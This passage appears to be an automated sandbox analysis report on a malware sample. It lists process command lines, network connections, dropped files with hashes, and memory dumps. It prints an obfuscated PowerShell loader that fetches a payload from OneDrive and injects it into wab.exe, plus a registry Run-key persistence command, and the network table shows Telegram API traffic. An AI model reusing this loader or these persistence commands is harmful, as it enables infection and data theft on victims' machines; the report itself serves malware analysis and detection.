frop Nonco[KoksjSAfbe.yTr.pasUds.ytHolyse .urrmUrteg.VelseT Desiet,ldexDenu,tsided.TilsiE Helhn .ljlc BandoChir dUrbaniRegisnGrinnglogwa]Fetia:Ampli: SkueA orsuSpropoC El cIIn ynITynds.Theo GShaheeJinket refuS.melttEpicorChas.i celdn.uleggOv.rp(Subtl$ ScytIHvidenZostetHumane.urghrGetaenKysteaModert Pr,eiFrostoCentrnX.logaHaandlCal ssApp r)Af ol ');Silkworks (undinens 'Putz.$Psy,hgSensilXyl to PirabStat.aSkomalBefra:P eobPReforhMoer oInfo.sIon.sp fedth ftneoCalamrErigeyDragalNeotea.ormltUafgjiYisflnQu.ckg E,em1Mos u0 Sten6 fspn=Uvsen$SignaC veraD.strtSyn.eaNattep OverhInteryAbsenl C,unlD.abeaInterrPar,eyPo tl.KolkhsBilliuSystebRehonsScummtEfterr Unmoi,rundn R mpgDestr(,ngul$Udv kSClimapForcil FedeiS,ivetRu,rifSvlgkl.rflaaNonubg u,deeKadetn TekneVolds1Skyro8 Forh,Gn st$ ta.lDProklaMid,esfa,mey .lenuSkarrrMountiLva udBeton)Sa,co ');Silkworks $Phosphorylating106;"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Centroid.Arb && echo t"
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Enriched = 1;Function undinens($Kommanderede){$Vejoverskringensndregulering=$Kommanderede.Length-$Enriched;$Unsublimed='Substring';For( $Vejoverskringens=5;$Vejoverskringens -lt $Vejoverskringensndregulering;$Vejoverskringens+=6){$Tatovren+=$Kommanderede.$Unsublimed.Invoke( $Vejoverskringens, $Enriched);}$Tatovren;}function Silkworks($Jordfyldens){ . ($Capriccettos) ($Jordfyldens);}$Brevteksten=undinens 'ProcrMbarbeo.ypotz VagaiR.vallEmbuslNo,itaForeb/ Durb5Hyp,r. Afdr0Prgn opody( H,nvWGoalei MalinVarekdS,mploS ovlw CetasTiltu OkkupN Pa,tTpu lm A.skr1danie0 Tris.Stads0Disbe; Tig. DroolWgeneriviewpnAs.hy6 Bram4Rigsa;,uccu NonvxXenop6 Erhv4Geant; T ta .ttterEksprvPo,en: Xiph1Gues 2 Funk1 Unhi.Repoi0K ist)Vatic RegneGCiv.le Thumc Tr,nkAssesoEngra/,deka2Reeve0Exant1Broc.0A lvn0Anorm1Hyd o0Trust1bu dl Regn.FSkri.iUric.rVese,eKu.vefImprooTankax Vine/ .ice1Tita.2 F,re1 Mode. Lekt0s rob ';$Outlast=undinens 'S.udeUGe.mes Bid eCash.rMaski-Lisb Ab komgReolpeOrdrenCen stIndkb ';$Skrmformularer=undinens 'Non nhFol,et rustt SpurpChowdsSlagt:La,er/F,rti/LaaneoReexhnHaa.deBegynd Iso rPrecaiB.girvProdie afvi.agterl PrusiAf,alvUnblie unte. intacHistoowineymApote/ ,aledD.naio Li.iwConfan BopllEpithoChampaOverrdMetap?Sto.vrKe,eseAlib.sLs eriAllehdBr,de=Usand1Cavi,FAfsluDfinanFForov2Socia0 Chlo5DuctuB S edBDistoDHotel5StnksFIsbry9.ermoF Godk5 Lacc%Natio2Untru1Arumu2Local5Kompl6Son e6Proco&MisgoaScu.uuHerb,tIntorhMininkResknePilloySkill=uddel!BremsA hoveF Va egIn.dk0I,nerNAnteccSimseS AarsNHaan 1Bedron IllaO itrotArteroPodzo5Sag.bcRitua ';$Servitutheftede=undinens ' Bema> ,rst ';$Capriccettos=undinens 'ReguiirefleeOuistxH,mot ';$Tenures='opskriv';$Autokraternes = undinens 'Filame M rvcTuberhBrusqoNeoza Safin%Frot.a KakipChoirpKasmid bawlaTekstteva,uaReans%skr,p\PartiCAdm,re OvernMusi.tKvadrr UbesoU,opoiJarlddLsb,a.GidegAD casrAr ejbBelnn Fodga&Dag n&,choc Tyroge GamicLejeah MarkoForfa alamtB,gge ';Silkworks (undinens 'swerd$AntiggResealTitalointerbTr giaMilitl Phys:eternF leabiBrinklConveiRememgD karrAfmataPard,ndesse=Waggo(SejlrcSkrifmBeeswdDdlk Synd/S,opfc Pr g Recri$Aegi ASamm uDisketRendeo mirak,nterrT,iuna F,ugtSesque DesprSytjenatomieSkandsDenat)Forar ');Silkworks (undinens 'Loise$lifergHuldslHunnioKnbe,bSmlehaSerislspild:VarsoGOffene Unq n NonteOutdirDumstaBe,fil LinniFagblz Sk.vaTelesbP enoiOstrelZ,gomiMarcitUndery Blya=Koje,$SlyngSToxoskAttesr BekemKombifPljniosubanr.epermYde,gu Prytloverla.valur SrineUtopirLandb.Svejss BrnepKr.dilfringic,pryt,aloc(Kl,en$ poinSPolyae flberGalopvShe,tiBundotSkiftuO scotShivehhypoaeDrivvfUrugutSkibieSnitcdTakine tros)Fryse ');$Skrmformularer=$Generalizability[0];$Fribblers107= (undinens 'fje l$ Quadg FrellKry boPrisobdispoaSprnglStrab:HyperST ggeeCarbonGamays ,ecoo,rmgarKarneeInvesr Bioen KlodeBlodt=MekanNKneeheCumbewAer.b-SubtuOKnfalbKaffejAb.ike,uttecPaschtSger. Sv.ghSScenayAnvensNav etkoldkeFurolmAgist.OkkupN Bence Lwoktneom,. OpskWKlatveFemdobFremdCUnsublAnisoi EvigeBlindn eplt');$Fribblers107+=$Filigran[1];Silkworks ($Fribblers107);Silkworks (undinens 'P.oto$,ammoSVict,eDimernbrndessk,ksoAnt,prUntroeTransrThro.nNarreeBadul. NonrH edake ,ysaaAntiodHjemmePtysmrConvesRimel[Shimp$SpartO D spuDuodetIntrolRocceaTelevs Tasstoffer]C.nvi=Frems$ CliqBGreasrmargee IncivInkjet C,oseFlskek GnocsTeleft VulpeJenomn Bade ');$Privilegiesystem=undinens 'Navle$UntilSBesmreSvesknTautosGlamoo ,moerBesl e Str,rVarienHvelsePer s.OversD Sul,oEvillwEst nnTrusslAcc,io fetaaAc.iddupfliF D esiOphrslTilfleda.ii(Anath$ ,ncoSSkppekApostr sphamtilskf DrosoVej.brPi atmReautu,redvlOverraH,nharIdenteD,merr.atio, Outb$SadelLHelgaoDumpec ToilaisocolDegeni ,itrzyab,yeSolonsSkjor)Rewid ';$Localizes=$Filigran[0];Silkworks (undinens 'relat$ScammgskarplUnderoBrandbSwiviaNilomlJanet:.laadFArme.o .attr elvmsAfsenoNichonBli.kiHorsen.eftegFaksieP rsonVertisChola=Assoc(UnrolTRappeeSkrnesSkal,tThorg-StrafPKiteda.araltudvikhTa,df Venst$ RhymLSphygocollecByw,laDefrolAffaliExpedz SteneC,codsCrawf)befal ');while (!$Forsoningens) {Silkworks (undinens ' Fois$SubmugOmbrylund,ko yewobPropoaTaarelBalti:NoncoF BarngN.ikatSailceDutchm AttaeDecims Da,otK.tteemacrorLslod= Penr$ NongtPhytorAltisudisoxeHovn ') ;Silkworks $Privilegiesystem;Silkworks (undinens 'MochaSEx ret Pe,aaSincerEncultLan,o-A.iatSNaadel axaeCon reTron pA,red Demar4Qua r ');Silkworks (undinens 'Hors.$CarbogTilbalDominocre tbMoorua,nsnal,otel:SekstFAuditoSp.acrT,ymos,tjpuoLu thn SeksilangrnAnf.egTi,dieSaetnnCatc,sDdsd.=opdag(lovm.T pstieA.ghas R ngt Aero- he ePMyz.saPov,lt TilshTatov Ferr.$helseLUdvejo GordcUndfaaIsbl,lB,rgiiGi.bozLabore,ubsssud.an)Vials ') ;Silkworks (undinens 'Noasu$Microg Predl vil o CentbStofhaCsareltempe:conteS olute Ha,imi aliiConsoeFiskencartogSlanda UlykgUovere Keynd Fini=Re.is$ PseugBevbnl h teoMisexbQuinqa Du,llbrdre:Disr M tnkeiTvivls .empaSav,lpEukarpansgnlFjel,i Sp,reBort,sflske+Rota.+,palt% Blub$SkovaGKundeeTransn F ree xagrSup,ra nhabl PriniUnintzAggrea IsohbSpil.iLovinlSvineiCutlitTestmy orma. Har.crapruoCallguN.bronElapst Papa ') ;$Skrmformularer=$Generalizability[$Semiengaged];}$Splitflagene18=294026;$Dasyurid=28720;Silkworks (undinens ' Bely$skolegDytt,lBehavo Bla b FamiaVouchl elet: ,utgTOpholi.ocielcheert DekaaAggellRaakreTurner UncosFrans ,rst=Radio DismoGCaps eSul,ut Alch-Ti.diCSl tloAuerbnH nortEn.ste,jemunHali.tTopfo Inter$Fl.ttLBesnaoLiparcSkuldaDee wlGrundiHjertzsmatte,ahitsCalvi ');Silkworks (undinens 'bisku$DrivrgTryktl UnstoFjerdbReklaaSporelRadbu:WildwIBar,enMarskt obbe passrS,ratnKonveaLevitt U,sviMaudlo,kovsnMus eaBit,elExoe,s Pern Vimp=apoph Pepos[ teroSHeaveyFidussfremft Gla,eYentnmKn,ld.Paon CrinkeoretronFuch,vE.fekeMolesrAf pnt Forh] hot: Sema:nazi.FJor,orKugleoPovelmKogevB Relea Epi.sScissePods,6Phill4Stvl.S Pr.st Platr SjleiGtem.nEksiggIndol(Spill$Plat T.oncliUnanalSubmatStivnaArv klJunnie AmnerKonfesCapit)Lugni ');Silkworks (undinens ' dias$S andg DroglM,sseoC entb ikra,oatmlAkt,t:Eks.rCTorstaSkak tDoleraU,snipDensihBaadey Uns.l TchalApp.aaF.rhrrAfkrvy .ean Filt= frop Nonco[KoksjSAfbe.yTr.pasUds.ytHolyse .urrmUrteg.VelseT Desiet,ldexDenu,tsided.TilsiE Helhn .ljlc BandoChir dUrbaniRegisnGrinnglogwa]Fetia:Ampli: SkueA orsuSpropoC El cIIn ynITynds.Theo GShaheeJinket refuS.melttEpicorChas.i celdn.uleggOv.rp(Subtl$ ScytIHvidenZostetHumane.urghrGetaenKysteaModert Pr,eiFrostoCentrnX.logaHaandlCal ssApp r)Af ol ');Silkworks (undinens 'Putz.$Psy,hgSensilXyl to PirabStat.aSkomalBefra:P eobPReforhMoer oInfo.sIon.sp fedth ftneoCalamrErigeyDragalNeotea.ormltUafgjiYisflnQu.ckg E,em1Mos u0 Sten6 fspn=Uvsen$SignaC veraD.strtSyn.eaNattep OverhInteryAbsenl C,unlD.abeaInterrPar,eyPo tl.KolkhsBilliuSystebRehonsScummtEfterr Unmoi,rundn R mpgDestr(,ngul$Udv kSClimapForcil FedeiS,ivetRu,rifSvlgkl.rflaaNonubg u,deeKadetn TekneVolds1Skyro8 Forh,Gn st$ ta.lDProklaMid,esfa,mey .lenuSkarrrMountiLva udBeton)Sa,co ');Silkworks $Phosphorylating106;"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Centroid.Arb && echo t"
C:\Program Files (x86)\windows mail\wab.exe
"C:\Program Files (x86)\windows mail\wab.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "merrows" /t REG_EXPAND_SZ /d "%Creepingly35% -w 1 $Polydactylous=(Get-ItemProperty -Path 'HKCU:\Decarbonylate\').Krydsrevidcrr;%Creepingly35% ($Polydactylous)"
C:\Windows\SysWOW64\reg.exe
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "merrows" /t REG_EXPAND_SZ /d "%Creepingly35% -w 1 $Polydactylous=(Get-ItemProperty -Path 'HKCU:\Decarbonylate\').Krydsrevidcrr;%Creepingly35% ($Polydactylous)"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.17.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.31.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| NL | 23.62.61.194:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 194.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | onedrive.live.com | udp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 8.8.8.8:53 | kructg.dm.files.1drv.com | udp |
| US | 13.107.42.12:443 | kructg.dm.files.1drv.com | tcp |
| US | 8.8.8.8:53 | 11.137.107.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 12.42.107.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 13.107.42.12:443 | kructg.dm.files.1drv.com | tcp |
| US | 13.107.42.12:443 | kructg.dm.files.1drv.com | tcp |
| US | 13.107.42.12:443 | kructg.dm.files.1drv.com | tcp |
| US | 13.107.42.12:443 | kructg.dm.files.1drv.com | tcp |
| US | 8.8.8.8:53 | 86.23.85.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 35.15.31.184.in-addr.arpa | udp |
| US | 8.8.8.8:53 | onedrive.live.com | udp |
| US | 13.107.137.11:443 | onedrive.live.com | tcp |
| US | 8.8.8.8:53 | krvlwa.dm.files.1drv.com | udp |
| US | 13.107.42.12:443 | krvlwa.dm.files.1drv.com | tcp |
| US | 8.8.8.8:53 | 58.99.105.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 8.8.8.8:53 | 220.167.154.149.in-addr.arpa | udp |
| US | 8.8.8.8:53 | tse1.mm.bing.net | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp |
| US | 204.79.197.200:443 | tse1.mm.bing.net | tcp |
| US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp |
Files
memory/1540-0-0x00007FFF96273000-0x00007FFF96275000-memory.dmp
memory/1540-6-0x0000020B6B380000-0x0000020B6B3A2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kwl2ia4x.xg4.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1540-11-0x00007FFF96270000-0x00007FFF96D31000-memory.dmp
memory/1540-12-0x00007FFF96270000-0x00007FFF96D31000-memory.dmp
memory/1540-13-0x00007FFF96270000-0x00007FFF96D31000-memory.dmp
memory/1540-14-0x00007FFF96273000-0x00007FFF96275000-memory.dmp
memory/1540-16-0x00007FFF96270000-0x00007FFF96D31000-memory.dmp
memory/1540-18-0x00007FFF96270000-0x00007FFF96D31000-memory.dmp
memory/1540-19-0x00007FFF96270000-0x00007FFF96D31000-memory.dmp
memory/3076-20-0x0000000004F80000-0x0000000004FB6000-memory.dmp
memory/3076-21-0x00000000055F0000-0x0000000005C18000-memory.dmp
memory/3076-22-0x0000000005CA0000-0x0000000005CC2000-memory.dmp
memory/3076-23-0x0000000005E40000-0x0000000005EA6000-memory.dmp
memory/3076-24-0x0000000005EB0000-0x0000000005F16000-memory.dmp
memory/3076-34-0x0000000005F20000-0x0000000006274000-memory.dmp
memory/3076-35-0x0000000006500000-0x000000000651E000-memory.dmp
memory/3076-36-0x0000000006540000-0x000000000658C000-memory.dmp
memory/3076-37-0x0000000007D50000-0x00000000083CA000-memory.dmp
memory/3076-38-0x0000000006AA0000-0x0000000006ABA000-memory.dmp
memory/3076-39-0x00000000077B0000-0x0000000007846000-memory.dmp
memory/3076-40-0x0000000007740000-0x0000000007762000-memory.dmp
memory/3076-41-0x0000000008980000-0x0000000008F24000-memory.dmp
C:\Users\Admin\AppData\Roaming\Centroid.Arb
| MD5 | ce5ca0bde39e064c961ec6739bda354f |
| SHA1 | 24aeeaece7e524d91aae4146804c78399689154b |
| SHA256 | f3a354a25146ca2333ceba147f2d6dbf947ce6c93e05821af208ff4a200d87e2 |
| SHA512 | 67ef4e09bd99f5aeeabe1ff4124a31175845fb8f140997e62578ad98e96ded54ba207b6684b062971e8943ca907a211a26713116747036cb739903e9a2edf3ca |
memory/3076-43-0x0000000008F30000-0x000000000E193000-memory.dmp
memory/1540-45-0x00007FFF96270000-0x00007FFF96D31000-memory.dmp
memory/4796-52-0x0000000001200000-0x0000000002454000-memory.dmp
memory/4796-54-0x0000000001200000-0x000000000123A000-memory.dmp
memory/4796-53-0x0000000001200000-0x0000000002454000-memory.dmp
memory/4796-57-0x0000000025A30000-0x0000000025ACC000-memory.dmp
memory/1540-58-0x00007FFF96270000-0x00007FFF96D31000-memory.dmp
memory/4796-59-0x0000000025930000-0x0000000025948000-memory.dmp
memory/4796-60-0x0000000025E50000-0x0000000025EA0000-memory.dmp
memory/4796-65-0x00000000268D0000-0x0000000026962000-memory.dmp
memory/4796-66-0x00000000268A0000-0x00000000268AA000-memory.dmp